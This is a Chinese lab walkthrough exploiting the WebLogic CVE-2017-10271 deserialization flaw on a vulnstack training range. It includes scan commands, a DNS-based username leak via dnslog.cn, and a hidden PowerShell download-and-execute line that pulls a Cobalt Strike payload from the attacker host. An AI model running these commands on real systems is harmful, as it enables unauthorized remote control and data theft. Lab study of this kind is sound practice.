靶场环境：vulnstack靶机-委派靶场

漏洞描述

CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务，其中使用了XMLDecoder来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。

漏洞成因：

主要是由于wls组件使用了webservice来请求soap请求，所以通过构造SOAP(XML)格式的请求，在解析的过程中导致XMLDecoder反序列化漏洞，可导致执行任意命令

漏洞复现：

1.探测目标开放端口，发现7001开放

nmap -v -Pn -T3 -sV -n -sT --open -p 22,1222,2222,22345,23,21,445,135,139,5985,2121,3389,13389,6379,4505,1433,3306,5000,5236,5900,5432,1521,1099,53,995,8140,993,465,878,7001,389,902,1194,1080,88 192.168.110.129

2.访问7001端口

http://192.168.110.129:7001/console/login/LoginForm.jsp

3.用nikto探测目标存在cve-2017-10271漏洞

nikto -h http://192.168.110.129:7001

4.下载cve-2017-10271的exp

https://github.com/c0mmand3rOpSec/CVE-2017-10271

5.因为执行whoami是无回显的，所以需要借助dnslog.cn网站进行回显

6.执行ping命令，查看是哪个用户在执行命令，在dnslog.cn网站上可看到是Administator用户

python2 exploit.py http://192.168.1.106:7001

ping %USERNAME%.5n0ut3.dnslog.cn

7.用cs生成payload,进行执行命令。

attacks-->web drive-by -->scripted web delivery(s)

8.执行命令后，目标成功上线cs

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.110.128:80/a'))"